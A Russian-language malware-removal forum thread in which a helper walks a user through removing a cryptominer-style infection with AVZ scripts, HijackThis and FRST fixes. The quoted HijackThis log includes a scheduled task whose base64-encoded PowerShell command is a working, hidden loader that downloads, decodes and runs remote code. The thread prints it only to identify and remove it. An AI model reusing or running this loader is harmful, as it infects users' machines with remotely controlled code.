Сервер регистрации Microsoft грузит процессор.

akok · Отправлено: **16:15, 20-02-2018** | #2

Прокси сами настраивали?
R1 - HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings: [ProxyServer] = 173.212.202.65:80 (disabled)
R1 - HKLM\System\CurrentControlSet\services\NlaSvc\Parameters\Internet\ManualProxies: (default) = 1163.172.220.221:8888

Закройте все программы, временно выгрузите антивирус, файрволл и прочее защитное ПО.

Выполните скрипт в АВЗ (Файл - Выполнить скрипт):

Код:

 begin
ExecuteFile('net.exe', 'stop tcpip /y', 0, 15000, true);
if not IsWOW64
 then
  begin
  SearchRootkit(true, true);
  SetAVZGuardStatus(True);
  end;
 QuarantineFile('C:\PROGRA~3\10acb4e4\2df70657.dll','');
 DeleteFile('C:\PROGRA~3\10acb4e4\2df70657.dll','32');
 ExecuteFile('schtasks.exe', '/delete /TN "{0C0B7A47-0D0E-0D79-7F11-0E080A051179}" /F', 0, 15000, true);
 ExecuteFile('schtasks.exe', '/delete /TN "{F7021E1C-2469-EF38-13AF-A44D7DF2DE14}" /F', 0, 15000, true);
 ExecuteFile('schtasks.exe', '/delete /TN "000137E8-52F5-89BA-D86F-91C07B8ED848" /F', 0, 15000, true);
 ExecuteRepair(1);
 RebootWindows(true);
   BC_Activate;
  ExecuteSysClean;
  ExecuteWizard('SCU', 2, 3, true);
 BC_ImportALL;
RebootWindows(true);
end.

Компьютер перезагрузится. После перезагрузки, выполните такой скрипт:

Код:

begin
CreateQurantineArchive(GetAVZDirectory+'quarantine.zip'); 
end.

Файл quarantine.zip из папки с распакованной утилитой AVZ отправьте с помощью этой формы или (если размер архива превышает 8 MB) на этот почтовый ящик: quarantine <at> safezone.cc (замените <at> на @) с указанием ссылки на тему в теме (заголовке) сообщения и с указанием пароля: virus в теле письма.

"Пофиксите" в HijackThis (некоторые строки могут отсутствовать):

Код:

O17 - HKLM\System\CCS\Services\Tcpip\..\{159fafbb-4099-49bb-971b-d89130e30e3d}: [NameServer] = 82.163.142.178
O17 - HKLM\System\CCS\Services\Tcpip\..\{159fafbb-4099-49bb-971b-d89130e30e3d}: [NameServer] = 82.163.143.176
O17 - HKLM\System\CCS\Services\Tcpip\..\{4d1eaf74-2b79-4684-9990-a6f8aff2b061}: [NameServer] = 82.163.142.178
O17 - HKLM\System\CCS\Services\Tcpip\..\{4d1eaf74-2b79-4684-9990-a6f8aff2b061}: [NameServer] = 82.163.143.176
O17 - HKLM\System\CCS\Services\Tcpip\..\{51b9bf77-56ff-47f5-a6c2-d6a5bee784c9}: [NameServer] = 82.163.142.178
O17 - HKLM\System\CCS\Services\Tcpip\..\{51b9bf77-56ff-47f5-a6c2-d6a5bee784c9}: [NameServer] = 82.163.143.176
O17 - HKLM\System\CCS\Services\Tcpip\..\{577e598b-f2d4-4e73-9119-719546b1c774}: [NameServer] = 82.163.142.178
O17 - HKLM\System\CCS\Services\Tcpip\..\{577e598b-f2d4-4e73-9119-719546b1c774}: [NameServer] = 82.163.143.176
O17 - HKLM\System\CCS\Services\Tcpip\Parameters: [NameServer] = 82.163.142.178
O17 - HKLM\System\CCS\Services\Tcpip\Parameters: [NameServer] = 82.163.143.176
O22 - Task: 000137E8-52F5-89BA-D86F-91C07B8ED848 - C:\WINDOWS\SysWOW64\regsvr32.exe /n /s /i:"/32416c8d1fa3a497 /q" "C:\Users\User\AppData\Local\FFFD37~1\{2DF70~1."
O22 - Task: {0C0B7A47-0D0E-0D79-7F11-0E080A051179} - C:\WINDOWS\system32\WindowsPowershell\v1.0\powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand IAAgACAAOwAgADsAIAAgADsAOwA7ACAAOwAgADsAOwAgACAAIAA7ADsAJABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIAbgBpAG4AZwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFAAcgBvAGcAcgBlAHMAcwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFYAZQByAGIAbwBzAGUAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsAJABEAGUAYgB1AGcAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsACgBmAHUAbgBjAHQAaQBvAG4AIABZAEoASQBFAFIAUgBEAFoAQwBFAF8ASwBFAEgAUABaAFkAQQAoACQAcAApAHsAJABuAD0AIgBXAGkAbgBkAG8AdwBQAG8AcwBpAHQAaQBvAG4AIgA7AHQAcgB5AHsATgBlAHcALQBJAHQAZQBtACAALQBQAGEAdABoACAAJABwAHwATwB1AHQALQBOAHUAbABsADsAfQBjAGEAdABjAGgAewB9AHQAcgB5AHsATgBlAHcALQBJAHQAZQBtAFAAcgBvAHAAZQByAHQAeQAgAC0AUABhAHQAaAAgACQAcAAgAC0ATgBhAG0AZQAgACQAbgAgAC0AUAByAG8AcABlAHIAdAB5AFQAeQBwAGUAIABEAFcATwBSAEQAIAAtAFYAYQBsAHUAZQAgADIAMAAxADMAMgA5ADYANgA0AHwATwB1AHQALQBOAHUAbABsADsAOwB9AAoAYwBhAHQAYwBoAHsAdAByAHkAewBTAGUAdAAtAEkAdABlAG0AUAByAG8AcABlAHIAdAB5ACAALQBQAGEAdABoACAAJABwACAALQBOAGEAbQBlACAAJABuACAALQBWAGEAbAB1AGUAIAAyADAAMQAzADIAOQA2ADYANAB8AE8AdQB0AC0ATgB1AGwAbAA7AH0AYwBhAHQAYwBoAHsAfQA7AH0AOwB9AFkASgBJAEUAUgBSAEQAWgBDAEUAXwBLAEUASABQAFoAWQBBACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAJQBTAHkAcwB0AGUAbQBSAG8AbwB0ACUAXwBTAHkAcwB0AGUAbQAzADIAXwBXAGkAbgBkAG8AdwBzAFAAbwB3AGUAcgBTAGgAZQBsAGwAXwB2ADEALgAwAF8AcABvAHcAZQByAHMAaABlAGwAbAAuAGUAeABlACIAKQA7AFkASgBJAEUAUgBSAEQAWgBDAEUAXwBLAEUASABQAFoAWQBBACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAJQBTAHkAcwB0AGUAbQBSAG8AbwB0ACUAXwBTAHkAcwB0AGUAbQAzADIAXwBzAHYAYwBoAG8AcwB0AC4AZQB4AGUAIgApADsAWQBKAEkARQBSAFIARABaAEMARQBfAEsARQBIAFAAWgBZAEEAKAAiAEgASwBDAFUAOgBcAEMAbwBuAHMAbwBsAGUAXAB0AGEAcwBrAGUAbgBnAC4AZQB4AGUAIgApADsACgAkAHMAdQByAGwAPQAiAGgAdAB0AHAAOgAvAC8AYgByAGkAZwBoAHQAYwBoAGkAZQBmAC4AYwBvAG0ALwB1AC8APwBhAD0ATQBiADUASQA0AEsAagBDAGEAWgBIAHAAWgBEADMAegBoAE4AWQBQAEgAeQA2AGQASwBEAEgAOABWAGcATwAzAGIASgB3AEQATgBOAGsAQQBuAHkAeQBMAE0ATgBJAGIAaQBJADEAVwBoAFMAZgB0AHoARQAtAFIAUgB3ADQATwB4AFcAZAA1AF8AbQBCAFUATwA0AGsALQBJAHEAVQB1AHoAMwA0AFEAMwBlAEEAUwBPAF8AbQBjAHYARQB2ADEAcwBNAHcAWABkAHgAcQAzADYAcwB6AHgARwBQAC0ASwB6AGYAbABOAGMAcAB3AGEAZwA2AGkAZgBRAGIANAA1AEEAUgBjAFoAWQBNAE0ARQBuAFkAdQBfAGYAQQBSAHMAdABHAFMAOQBHAE0ASwBhAHgAVwBWAGQATgBCAHMAQwBfAC0AbQBiAFgAegBTADAANwBKADIAeABjAGcANgBHAHEAcwBPAEEAawBGADMAawBZAHMAcABYAEwAYQBaAHAAcwBfAHMAUgB3AFMAegBKAEYAeABzADgAZABMAEwAMABsAGMATQBFAHIAQgB5AHcAXwBkAC0AYQBNAEgAOQBtADcAVgBRAG8AeQA5AEEAZQAtAG0AeAA0AHMAYwBjAGUAawA1AGwAOQBHAHkANQA4ADMAXwBkAGwAOAA2AFkAXwBNAEkAdgAxAE0AbwBJAHkAUgB6AFEASABtAGcAZgBlAHYAVQBkADYATABQAHoASgBEAHUANABSAFcAZwBVAFoAOQBYAHgAdwBsAGEASgBGADEARQBVAEEAegBDAFQATwBFAE8ANAA0AFkAagBtAGwATABEADEATgBCAEYAVwB0ADcAWgBZAHAAYgA1AGkAeQByADYAeQBIAHAAQwBZAGEAeQB2AEsAVQBBAHIATgBIAHkAVABFAE4AYwAyAEgATwB2ADkAaABZAGEATgB0AE8ASABxAGwAUABYAFEAYgBhADUAdwBtAEMAcQBaAFUATQAwAHIAaABrAHAAYQB6AEkARABLAEMAcABQADgAMwA3AFoAawA2AFIASABnAEgAMQBBAEUAUwA4AFMAbwB5AEYAYgBuAFkAcQBVADMAUgBnAGYAbQB3AEUAXwB2AHkAcQBEAGwAYwB2AGgANgBjAG0AQQB0AHkAMgBnADEALQB0AEkATAB3AEwAYgBXAFgATABFAE8AMABCADIAdABPADUAZABUAGIAUQByAGQANABsAG8AbwBJAHMAMQBCAEMATgBYAHQAOQBqAHAAZQByAEwAOABWAGYAdwBIAHQARwBxAFMANAByAHMAdABXAHYAVQA5AFYAQwB1AHgANQBYAGgAcQBjADAAUQAzAEkANABkAG0ATQBZAHUAeABXAE0AQQAxADkAbgBCADgANABxAEsAZQA1AGgARABtAFYAVAB1AFgAQwAzAHIAUwBpAGQAQgBGADIAUgBvAGsAbAA2AE8AdABSAFIAMgBYAGUAXwBkAGgAeABHAHAAYgA2AGEAMQBfAEMAZgBkAE8AbwBJAFEASwB2AG8AdgA4AHIAZQBpAGsAbQBhAE8AVgBLAEoAcgBTAG8AUQAyAHgAbQBzAHAAXwB4AHkAYgBSAG0AeABBAEsATwBuAGEAMABYAHUAZwBRAHcAbABaAEcAOABPAFcAUgBhAFcAYgB0AHgAVQBaAEUAOABLAEcAYQBJAFEAdgBjADQAYgAxADIAaQBzAC0AZAA1ADcAeABXAGQAdQBzAGsAZQBkAGIAbwBiAHYAdQBzAG8AVQB5AFQAQQBKAHEAYgBCADAAVgA4AFoAUABVAGkAQgBEAFEAdgBGAHQAZQBhAHUAbQA3AE8AQgA5AGIATABrAGkAdQBRAC0AaABIAEkAbgBNAG8AMgBTAFMARABMAGYAOABxADMAYwBPAG8AVAB1AFgAQwBqAHQAbABXAEYAdgBRAHcAYgBsADAAcQB5ADIAVQBWAG0AYQBHAFoAYgBaAFUAVABGAHQAeABuAHIAVgBTAG0AcQAwAG8ASQBiAEkAVgBWAHYAMQBBAE8AdgBGAHEAcgBnADcAWAB0AGwAegBKAHIASQBYAFcAUQBHAGIAaQA0AEEAUQBDAFEAeABxAHAAcgByAGgAYQBBAFkAZQBYAGsAYQBFAEQAQwBiADIAdwAtAFcAVgBuAE0ASwBLAHgARgBvAEMAeAA0ADgAOQBRADQATQAwAG0ARQAwAFkAZwBOAGEAegBZAHQAOAAwAHMAQwA1AHoANABlAHMAXwB3ADIANAB6AFAATAB3AEIAbQBuAFYASgBkAF8AUQA0AHkAYgA3AEEAMgBUADgARwA2AEsAOQBfAGcAdgA0AG4AeABWAG0AMQBnAEMAWABsAC0AOAB4AFYAVgBuAFMAbQB2AHgAXwA2AEMAaABGAEMANwByAE0AMQBKAFcASABZADQAUABoAGsAUABmAGcAUgBXAEYASQA4AHkANgBkAFUALQBOAGEAdQAyAGwAbQBOAHMATQA5AEIAbQBWADMAVABrADYAUwBhAFoARwBKAFcAVgB1AGMAMABHAHAAbgBNAEcARAA5ADYAcgBzAGEAcAAtAFAAJgBjAD0ARwBkAHQAbABvAGoAQQByAHgAbwB6ADAATwBQAEMAWABwAFkAeAB2ADIAZABMAHcATgB5AG4ARQBZAHQASABCAHkAMgBmAGsAMQAzAG8AMQAzAFUAZwBfADAARQBXAFIATwBNAEwAdQBKAEcAeQBaAGsANABYAFcAOQA1ADcAdwBjAFoAQQA1AC0ASwBpAE0ASgBMAFMAdgAxAFQAdABUAEMALQAtAFMARgByADQAYwB2ADAAQQBfAGsAcwAwAHYAaABPAFEAeQBGAGUAWAB5AGgATwAzAGUANgByAEkAdwB6AFIATQBjAFgAcAB3ADYASABtAGkAbAB5AHAAegBFAFoAeQBsAHgAbABfADUATQA3ADYAcwBxAE0AUQBIAGsAZgBDAHgAawBvAC0AQgBqADQATQBoAEgATQBTAFoAMwA5AHEAZABnADEAawBXAGoATQBPAFQAUwBpADMAawBBADUANgBDAEwANQBpAF8AbAA2ADUAQQBtAHoAMwA5AHkAVgBlAFUAagAyAGoAQgBrAGwAOQBFADAAQgBHAF8AUABlAHIATgBNAF8AWQBoAHMAMQBoAEgAbQBoAFcAXwBFAG0AQgA2AHkAOABtAG0ARABDAHYAYwBLAHkAWgBhAEoAUwBjAEwAWgBfAGYANgB0AFkATwBnAFAATgA4ADAAdQBjAFEAdAB1AGkAUABnAHgARABzAG4AMQBNAHgAMQAyAGoAMwBsAFYAZwAxAGkAbABVAHcAdQBuADQAcABjAGQAaQBjAGIAdABpADEAUQBoAGYAeQBuADEAOABHAHIASQAyAEgAdgB4AFMAbQBYAEIANgAxADYAYgBVAEsAQwBBAHcAdABUAGgAeQByADkAXwAyAGcASgBRAEIANwBsADIATwBFADEARgBNAHIAUgAtAHcAZgBjAHkAOAByAFoAcwA5AE0AegByAGoAQQBPAFAAVQByAEQAagA4AEEARAAzAFQAOABLAEMAdgBqAGcAagBjADEAdwBNAGIAWgBWAE8AeQAwAGwAUAB2AHUAVwBPAGoAMgB4AF8ATAB3AEsAVgAzAHAAQQBiAEgAMwBpAHgAYgBaAEgAegBkAGIAYgB4AEIARQBiADQAcQBWADUAYwBwAEcAcQBDAE4AbgBmAFcAdwBOADAARwBCADgAQwBRAHUAUAByAG8AcgBjAGcAYgBqADAAMABsAFUAMQB1ADAAQwBVAG4AdgBvAEwATABiAEEARgBBAG0ANgBkAGgAYgBaAFcAZABNAEYASgA1AGkAUgBtADEAZgBKAHkAZgBuADAAVQBSAEgAcwBpAFIASgBqADkARQB0ADUAVABZAC0AcQBxAEUANgA0AHQAWQBDAGcAcgA1AGoAQwBDAHIAdwBGAFMANABYAGkAMwAwADMAWQByAGEAeQBkAGEAUwBrADcAWQBNAFMAOABjAHQAMQBBAGgAYwBlAFAATABjAGQAdwAwAFUAdQBiAFEAZgAwAFgAZQBGAGIAZgBMAHUASwBlAEEAMQBkAFoAZQBqADAAbABvADMAUgBXAEoAaQBPADQAUAA1AFoAZwBYAGsAbwBhAGYAcgB3ADgANABRAHQAMQBpAG4AWQBCAEIAbABvADQAQgBvAEsAdwBEAEIAbAA4AGQANgBvAG8AMwBkAFIAaABjADcAQwA4AF8ANwBpAHcAbwBZAEcAbgBWAF8ARwBMAC0ASwBsAHEAMwBaADYARQBxADMAUABMADIAMQBaAHYAVgAxADkAUwB2AEEARwAwAFMAWgBYAFMAdQBOAFgAaABPAEIAbgB1ADMAaQBrAHEANwBrAEEAbQByADUAYgBvAGMAOABsAFAAdQBLAGsAQgA1AE4AcwBrAHkAMgBsAEMAMwBkAHMAcwB0AE4AWABsAG0AVwB2AGgAaABOAEsAVABiAGYAcQBtAHQARwBrAEEASgA0ADIANwBBAE4ATwBzAE0AUwB5AGUAUABpAHUAQwB0ADYARwBBAHQAeAA1ADAAMwBSAGUAQwA5ADkAMgByAFQAVgBvADYAQQAtAEwARAAtADQAWABXAFAAUQA4AFcASQBJAHMANwBHAHoARABLAHQAWQB2AHgAOABVAFAAQgBIAEYATABNAHAANQBVAHQAaQBHAG8ANgBaADMANQBhAGYAcgA0AEEAWABLAHQATgBrAGMAWABnADMAbQA0ADQATQBTAGcAJgByAD0AMgAxADIAMQA5ADIAOAA3ADAANQA4ADQAOQA0ADQANgA4ADYAMAAiADsAJABzAHQAcwBrAD0AIgB7ADAAQwAwAEIANwBBADQANwAtADAARAAwAEUALQAwAEQANwA5AC0ANwBGADEAMQAtADAARQAwADgAMABBADAANQAxADEANwA5AH0AIgA7ACQAcAByAGkAZAA9ACIAZgBsAG8AYQB0AGkAbgBnACIAOwAkAGkAbgBpAGQAPQAiAFIAVABXAFAAVwBQAFUATgAiADsAdAByAHkAewBpAGYAKAAkAFAAUwBWAGUAcgBzAGkAbwBuAFQAYQBiAGwAZQAuAFAAUwBWAGUAcgBzAGkAbwBuAC4ATQBhAGoAbwByACAALQBsAHQAIAAyACkAewBiAHIAZQBhAGsAOwAgAH0AJAB2AD0AWwBTAHkAcwB0AGUAbQAuAEUAbgB2AGkAcgBvAG4AbQBlAG4AdABdADoAOgBPAFMAVgBlAHIAcwBpAG8AbgAuAFYAZQByAHMAaQBvAG4AOwAKAGkAZgAoACQAdgAuAE0AYQBqAG8AcgAgAC0AZQBxACAANQApAHsAaQBmACgAKAAkAHYALgBNAGkAbgBvAHIAIAAtAGwAdAAgADIAKQAgAC0AQQBOAEQAIAAoACgARwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBTAGUAcgB2AGkAYwBlAFAAYQBjAGsATQBhAGoAbwByAFYAZQByAHMAaQBvAG4AIAAtAGwAdAAgADIAKQApAHsAYgByAGUAYQBrADsAfQB9AAoAaQBmACgALQBOAE8AVAAgACgAWwBTAGUAYwB1AHIAaQB0AHkALgBQAHIAaQBuAGMAaQBwAGEAbAAuAFcAaQBuAGQAbwB3AHMAUAByAGkAbgBjAGkAcABhAGwAXQBbAFMAZQBjAHUAcgBpAHQAeQAuAFAAcgBpAG4AYwBpAHAAYQBsAC4AVwBpAG4AZABvAHcAcwBJAGQAZQBuAHQAaQB0AHkAXQA6ADoARwBlAHQAQwB1AHIAcgBlAG4AdAAoACkAKQAuAEkAcwBJAG4AUgBvAGwAZQAoAFsAUwBlAGMAdQByAGkAdAB5AC4AUAByAGkAbgBjAGkAcABhAGwALgBXAGkAbgBkAG8AdwBzAEIAdQBpAGwAdABJAG4AUgBvAGwAZQBdACAAIgBBAGQAbQBpAG4AaQBzAHQAcgBhAHQAbwByACIAKQApAHsAYgByAGUAYQBrADsAOwB9AAoAZgB1AG4AYwB0AGkAbwBuACAAWgBUAEYARgBTAFUAVwBUAFQATABCACgAJAB1AHIAbAApAHsAJAByAHEAPQBOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJAByAHEALgBVAHMAZQBEAGUAZgBhAHUAbAB0AEMAcgBlAGQAZQBuAHQAaQBhAGwAcwA9ACQAdAByAHUAZQA7ACQAcgBxAC4ASABlAGEAZABlAHIAcwAuAEEAZABkACgAIgB1AHMAZQByAC0AYQBnAGUAbgB0ACIALAAiAE0AbwB6AGkAbABsAGEALwA0AC4AMAAgACgAYwBvAG0AcABhAHQAaQBiAGwAZQA7ACAATQBTAEkARQAgADcALgAwADsAIABXAGkAbgBkAG8AdwBzACAATgBUACAANgAuADEAOwApACIAKQA7AHIAZQB0AHUAcgBuACAAWwBTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBFAG4AYwBvAGQAaQBuAGcAXQA6ADoAQQBTAEMASQBJAC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAHIAcQAuAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACgAJAB1AHIAbAApACkAOwA7AH0ACgBmAHUAbgBjAHQAaQBvAG4AIABBAFIATwBQAEMAKAAkAHIAYQB3AGQAYQB0AGEAKQB7ACQAYgB0AD0AWwBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAHIAYQB3AGQAYQB0AGEAKQA7ACQAZQB4AHQAPQAkAGIAdABbADAAXQA7ACQAawBlAHkAPQAkAGIAdABbADEAXQAgAC0AYgB4AG8AcgAgADEANwAwADsAZgBvAHIAKAAkAGkAPQAyADsAJABpACAALQBsAHQAIAAkAGIAdAAuAEwAZQBuAGcAdABoADsAJABpACsAKwApAHsAJABiAHQAWwAkAGkAXQA9ACgAJABiAHQAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACgAKAAkAGsAZQB5ACAAKwAgACQAaQApACAALQBiAGEAbgBkACAAMgA1ADUAKQApADsAfQAKAHIAZQB0AHUAcgBuACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAFMAdAByAGUAYQBtAFIAZQBhAGQAZQByACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEQAZQBmAGwAYQB0AGUAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQAoACQAYgB0ACwAMgAsACgAJABiAHQALgBMAGUAbgBnAHQAaAAtACQAZQB4AHQAKQApACkALABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAOwA7AH0ACgAkAHMAYwA9AEEAUgBPAFAAQwAoAFoAVABGAEYAUwBVAFcAVABUAEwAQgAoACQAcwB1AHIAbAApACkAOwBJAG4AdgBvAGsAZQAtAEUAeABwAHIAZQBzAHMAaQBvAG4AIAAtAGMAbwBtAG0AYQBuAGQAIAAiACQAcwBjACIAOwB9AGMAYQB0AGMAaAB7AH0AOwBlAHgAaQB0ACAAMAA7AA==
O22 - Task: {F7021E1C-2469-EF38-13AF-A44D7DF2DE14} - C:\WINDOWS\system32\regsvr32.exe /s /n /i:"/rt" "C:\PROGRA~3\10acb4e4\2df70657.dll"

Скачайте Farbar Recovery Scan Tool и сохраните на Рабочем столе.

Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
Запустите программу. Когда программа запустится, нажмите Yes для соглашения с предупреждением.
Отметьте галочкой также "Shortcut.txt".

Нажмите кнопку Scan.
После окончания сканирования будут созданы отчеты FRST.txt, Addition.txt, Shortcut.txt в той же папке, откуда была запущена программа. Прикрепите отчеты к своему следующему сообщению.
Подробнее читайте в этом руководстве.

tomclar · Отправлено: **18:02, 20-02-2018** | #3

Прокси сам настраивал.
quarantine.zip создаётся пустым и весит 1кб. Есть смысл отправлять его по форме?
Отчёты отправляю

tomclar · Отправлено: **19:06, 20-02-2018** | #4

Забыл упомянуть - пофиксил в HijackThis . После перезагрузки уже в течение трёх часов не наблюдаю данной проблемы.

akok · Отправлено: **19:41, 20-02-2018** | #5

Цитата tomclar:

uarantine.zip создаётся пустым и весит 1кб. Есть смысл отправлять его по форме? »

Не нужно тогда.

Сами политики настраивали?
HKLM\...\Policies\Explorer: [LinkResolveIgnoreLinkInfo] 1
HKLM\...\Policies\Explorer: [NoInternetOpenWith] 1
HKLM\...\Policies\Explorer: [NoLowDiskSpaceChecks] 1
HKLM\...\Policies\Explorer: [NoResolveSearch] 1

Отключите до перезагрузки антивирус.

Выделите следующий код:

Код:

Start::
CreateRestorePoint:
HKU\S-1-5-21-4254744389-2531880652-1270121733-1001\...\Policies\Explorer: [] 
GroupPolicy: Restriction <==== ATTENTION
SearchScopes: HKU\S-1-5-21-4254744389-2531880652-1270121733-1001 -> {FFEBBF0A-C22C-4172-89FF-45215A135AC7} URL = 
HKU\S-1-5-21-4254744389-2531880652-1270121733-1001\Software\Classes\.scr: scrfile =>  <==== ATTENTION
EmptyTemp:
Reboot:
End::

Скопируйте выделенный текст (правой кнопкой - Копировать).
Запустите FRST (FRST64) от имени администратора.
Нажмите Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению.

Компьютер будет перезагружен автоматически.

Подробнее читайте в этом руководстве.

tomclar · Отправлено: **21:51, 20-02-2018** | #6

Не помню чтобы сам политики настраивал)

akok · Отправлено: **22:21, 20-02-2018** | #7

Цитата tomclar:

Не помню чтобы сам политики настраивал) »

Тогда фиксим

Отключите до перезагрузки антивирус.

Выделите следующий код:

Код:

Start::
CreateRestorePoint:
HKLM\...\Policies\Explorer: [LinkResolveIgnoreLinkInfo] 1
HKLM\...\Policies\Explorer: [NoInternetOpenWith] 1
HKLM\...\Policies\Explorer: [NoLowDiskSpaceChecks] 1
HKLM\...\Policies\Explorer: [NoResolveSearch] 1
EmptyTemp:
Reboot:
End::

Скопируйте выделенный текст (правой кнопкой - Копировать).
Запустите FRST (FRST64) от имени администратора.
Нажмите Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению.

Компьютер будет перезагружен автоматически.

Подробнее читайте в этом руководстве.

Цитата tomclar:

После перезагрузки уже в течение трёх часов не наблюдаю данной проблемы. »

Тогда сразу финальные рекомендации
Подготовьте лог лог SecurityCheck by glax24

Ознакомьтесь: Рекомендации после лечения

Пополните, пожалуйста, базу безопасных файлов антивирусной утилиты AVZ:

Запустите AVZ.
Выполните обновление баз (Меню Файл - Обновление баз)
Закройте все приложения, и запустите используемый в Вашей системе интернет-браузер (например Internet Explorer, FireFox, Opera и т.д. - если применяется несколько браузеров, то необходимо запустить их все для того чтобы AVZ смог проанализировать используемые браузерами модули расширения и плагины)
В AVZ выберите пункт меню Файл - Стандартные скрипты. В открывшемся окне необходимо отметить скрипт №8 ("VirusInfo.Info: Скрипт сбора файлов для экспресс-анализа ПК") и нажать кнопку "Выполнить отмеченные скрипты". Выполнение скрипта займет некоторое время, порядка 1 - 5 мин. В результате в папке AVZ будет создан подкаталог LOG, в нем архив с именем virusinfo_files_<имя_ПК>.zip
Закачайте полученный архив, как описано на этой странице.
Если размер архива превышает 250 Мб закачайте его на любой файлообменник, не требующий ввода капчи (например: RGhost, Zippyshare, My-Files.RU, karelia.ru, Ge.tt или WebFile) и укажите ссылку на скачивание в своём следующем сообщении.

tomclar · Отправлено: **00:26, 21-02-2018** | #8

Финальные логи. Кажется, проблема решена. Спасибо огромное! Так это был майнинг криптовалюты или амиго какой-нибудь?

akok · Отправлено: **11:25, 21-02-2018** | #9

Исправляем по возможности
------------------------------- [ Windows ] -------------------------------
Internet Explorer 11.125.16299.0 Внимание! Скачать обновления
^Онлайн установка. Последняя версия доступна при включенном обновлении Windows через интернет.^
Запрос на повышение прав для администраторов отключен
^Рекомендуется включить уровень по умолчанию: Win+R ввести UserAccountControlSettings и Enter^
--------------------------- [ FirewallWindows ] --------------------------- (просто включите защиту 360 Total Security)
Отключен доменный профиль Брандмауэра Windows
Отключен общий профиль Брандмауэра Windows
Отключен частный профиль Брандмауэра Windows
-------------------------- [ OtherUtilities ] ----------------------------
7-Zip 16.04 (x64) v.16.04 Внимание! Скачать обновления
^Удалите старую версию, скачайте и установите новую.^
WinRAR 5.31 (32-разрядная) v.5.31.0 Внимание! Скачать обновления
Ghostscript GPL 8.64 (Msi Setup) v.8.64 Внимание! Скачать обновления
-------------------------------- [ Java ] ---------------------------------
Java 8 Update 161 v.8.0.1610.12 Внимание! Скачать обновления
^Удалите старую версию и установите новую (jre-8u162-windows-i586.exe)^
------------------------------- [ Browser ] -------------------------------
Mozilla Firefox 54.0.1 (x86 ru) v.54.0.1 Внимание! Скачать обновления
---------------------------- [ UnwantedApps ] -----------------------------
Ace Stream Media 3.1.16.1 v.3.1.16.1 Внимание! Нежелательное ПО. Описание программы.